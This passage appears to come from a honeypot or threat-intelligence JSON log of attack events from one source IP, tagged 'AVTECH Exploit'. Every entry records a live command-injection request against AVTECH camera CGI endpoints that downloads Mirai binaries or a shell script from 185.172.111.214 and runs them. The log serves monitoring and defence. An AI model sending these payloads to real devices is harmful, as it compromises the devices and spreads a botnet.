- "event_count": 2,
- "first_seen": "2020-05-31T22:36:40Z",
- "last_seen": "2020-05-31T22:47:43Z"
- },
- {
- "event_id": "1657dbee6b5f56eb654e68dd7cfd988f76d8db77bcaa65f8b3c206fd25a6385a",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5555,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-05-31T22:34:19Z",
- "last_seen": "2020-05-31T22:46:20Z"
- },
- {
- "event_id": "2c0c0a0e5f369651b30462a4ce6b15b7ac7c4ce79c0493b50efc8b964ca9ef8f",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-05-31T22:31:47Z",
- "last_seen": "2020-05-31T22:46:20Z"
- },
- {
- "event_id": "bdc950909997dfc151f3dc2504a3dba671fc6c70ae84674b5b401bebcd3e925b",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8008,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-05-31T22:41:33Z",
- "last_seen": "2020-05-31T22:46:19Z"
- },
- {
- "event_id": "4efc2db27104f2ac57faea8289c60f4f27a36bc16cae707da4dcb23d80371d68",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-05-31T22:31:45Z",
- "last_seen": "2020-05-31T22:46:18Z"
- },
- {
- "event_id": "0e874bf008697b217e32f0a242db0b12fc575f73880dc3a6d974184db7790091",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 4567,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-05-31T22:34:33Z",
- "last_seen": "2020-05-31T22:44:11Z"
- },
- {
- "event_id": "0770a17cb4744fb02becff0baf88104f11e361f2e49ee2fa78c72d178cc2714f",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 4567,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-05-31T22:34:31Z",
- "last_seen": "2020-05-31T22:44:09Z"
- },
- {
- "event_id": "092d5593ae9bcca97b05cf1b91aeec55ac7d8334a43928bafd7d9f652fd7a54c",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:43:56Z",
- "last_seen": "2020-05-31T22:43:56Z"
- },
- {
- "event_id": "0836fdc6fb73bb41ba488b39c9449eb11c8c941588fa8ca7ec157c459fc7072a",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8009,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:43:44Z",
- "last_seen": "2020-05-31T22:43:44Z"
- },
- {
- "event_id": "00d99b7d75270bd93c4f5bc7297c8c2d422218795a1b313238ca10dac20ba6b3",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 10443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:42:04Z",
- "last_seen": "2020-05-31T22:42:04Z"
- },
- {
- "event_id": "53431d12c2f26cb61779da70e795bc4ae5fe64b9b9c0be7042cf618e8f414ff1",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7474,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:42:02Z",
- "last_seen": "2020-05-31T22:42:02Z"
- },
- {
- "event_id": "511dfa1c0f3c2ab01d565f44062724dadb70fb99ad7758e4b57b6f3cd5af2896",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7474,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:42:00Z",
- "last_seen": "2020-05-31T22:42:00Z"
- },
- {
- "event_id": "c8db4a17f6b61140da19023565cf9b077f7d36a82f78394f5665e1b685584f7b",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8123,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:41:59Z",
- "last_seen": "2020-05-31T22:41:59Z"
- },
- {
- "event_id": "4e1c980dea436983ffae8ea641d8910e9b4a73e26f90ad42a41b437301a90e78",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8123,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:41:57Z",
- "last_seen": "2020-05-31T22:41:57Z"
- },
- {
- "event_id": "3245148ca89bcdf752d490fe0236907983da789805c1ca6023ad6832ab6e659b",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:41:33Z",
- "last_seen": "2020-05-31T22:41:33Z"
- },
- {
- "event_id": "d0d1f57b1a3197c08f131528311bb232723ba93adea40a63a984da7e77914bcb",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8090,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:36:40Z",
- "last_seen": "2020-05-31T22:36:40Z"
- },
- {
- "event_id": "5353b6d0d559942c18ab25d36ecaa8f3d2c148dfd8d7bac047e2ed17fe8bd262",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:36:08Z",
- "last_seen": "2020-05-31T22:36:08Z"
- },
- {
- "event_id": "e79707e711988acdf33c4a236c8bd5d45a0c08cb0655c670202a758a30493d9f",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:34:34Z",
- "last_seen": "2020-05-31T22:34:34Z"
- },
- {
- "event_id": "e5b557394d3b5b9e7ac0903afd11edec3e9e9517f9190c24518c69c3598e7d9c",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8081,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:34:33Z",
- "last_seen": "2020-05-31T22:34:33Z"
- },
- {
- "event_id": "e028406198cd8080422d566a64ce9ad003f6845f18514016598ccd61804856bc",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:34:32Z",
- "last_seen": "2020-05-31T22:34:32Z"
- },
- {
- "event_id": "07529c2c9afff0b522c18e7e82d79e90b2aa239472ad0481293dedaad96e8ac8",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:32:16Z",
- "last_seen": "2020-05-31T22:32:16Z"
- },
- {
- "event_id": "32290f8e5e2167539bd330614a25f2720b100b4099d0d82571d22f16346a6e38",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:32:14Z",
- "last_seen": "2020-05-31T22:32:14Z"
- },
- {
- "event_id": "9b06204a239cea17fd141231dd2899c674569fc57fcfa62af4506b6a81f26bdb",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:32:14Z",
- "last_seen": "2020-05-31T22:32:14Z"
- },
- {
- "event_id": "da1a8ff154caced69819fb29632c2b907b66ebbafc6705e3b8956c6188244b50",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:32:12Z",
- "last_seen": "2020-05-31T22:32:12Z"
- },
- {
- "event_id": "13fc91df1b619b99b85c706647294b6dc8aab8de96ecfc7fafcdd98f879856d5",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:32:11Z",
- "last_seen": "2020-05-31T22:32:11Z"
- },
- {
- "event_id": "8409293b21cd4abb3efd5248df7fd7010a528e00386a5356157090ead425c922",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/bins/UnHAnaAW.arm7 -O 19.mirai.arm7; chmod 777 19.mirai.arm7; ./19.mirai.arm7 w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:32:09Z",
- "last_seen": "2020-05-31T22:32:09Z"
- },
- {
- "event_id": "143e6797e93b92aaf3ae0407a05efa52e7c8392d7f89560df55f1b5fbf3f4864",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-05-31T22:20:21Z",
- "last_seen": "2020-05-31T22:21:03Z"
- },
- {
- "event_id": "8c9257fa8a1b89512928dc2be910370fe4bfc9d5d7a86dced2a5d222a3e0f939",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 5001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:21:03Z",
- "last_seen": "2020-05-31T22:21:03Z"
- },
- {
- "event_id": "0e28e4547bf1a76ff740efeef026095701fe8cfc8873c053ba7d2b26623513f8",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 5001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:21:01Z",
- "last_seen": "2020-05-31T22:21:01Z"
- },
- {
- "event_id": "7dd0c2454dde917a3ff653d5d0da5acb696b6b0b130bec002c27265f4d365de5",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 8443,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 2,
- "first_seen": "2020-05-31T22:20:19Z",
- "last_seen": "2020-05-31T22:21:00Z"
- },
- {
- "event_id": "74be63f36d924dd52786ea0de65f0c4117e822b019f1d117312bfda3a486ae7c",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:20:50Z",
- "last_seen": "2020-05-31T22:20:50Z"
- },
- {
- "event_id": "fd487e15f43a01a70c65b7ebafe96f333c316c33d33d1a81ea4974eb95c8df56",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:20:48Z",
- "last_seen": "2020-05-31T22:20:48Z"
- },
- {
- "event_id": "47293ed0d8ca3a65dbbe0e3881c66a0c7df34ab168dfb8fbdcb41697353d9bf0",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:20:48Z",
- "last_seen": "2020-05-31T22:20:48Z"
- },
- {
- "event_id": "3afe48a5af4ab6a21642118655c58f6d84b53e13dd9a936185636795999ea2e7",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 7001,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:20:46Z",
- "last_seen": "2020-05-31T22:20:46Z"
- },
- {
- "event_id": "bb1bacc8252a1bbed71f36c5fd2ee45251f6c7848cce393b88ab2db77e3f913a",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:20:45Z",
- "last_seen": "2020-05-31T22:20:45Z"
- },
- {
- "event_id": "7498009199f529cb056c79e62ab1316704321e00daa7ab8a126fc15ae9f55188",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 49.8UsA.sh; chmod 777 49.8UsA.sh; sh 49.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9200,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:20:43Z",
- "last_seen": "2020-05-31T22:20:43Z"
- },
- {
- "event_id": "4e16c663e029d42916569db19460da949ab79e817219f7ccd61bc266308cc8eb",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av; echo snickers_was_here HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
- "first_seen": "2020-05-31T22:19:01Z",
- "last_seen": "2020-05-31T22:19:01Z"
- },
- {
- "event_id": "55262234c050de544f91fa927c99b8799b0f73daebf7235b6f99db4a190fa8c8",
- "source_ip_address": "35.193.32.21",
- "country": "US",
- "user_agent": "Snickers-Avtech",
- "payload": "GET /cgi-bin/nobody/Search.cgi?action=cgi_query&ip=google.com&port=80&queryb64str=Lw==&username=admin ;XmlAp r Account.User1.Password>$(cd /tmp; wget http://185.172.111.214/8UsA.sh -O 33.8UsA.sh; chmod 777 33.8UsA.sh; sh 33.8UsA.sh w00dy.av)&password=admin HTTP/1.1",
- "post_data": "",
- "target_port": 9002,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "AVTECH Exploit"
- }
- ],
- "event_count": 1,
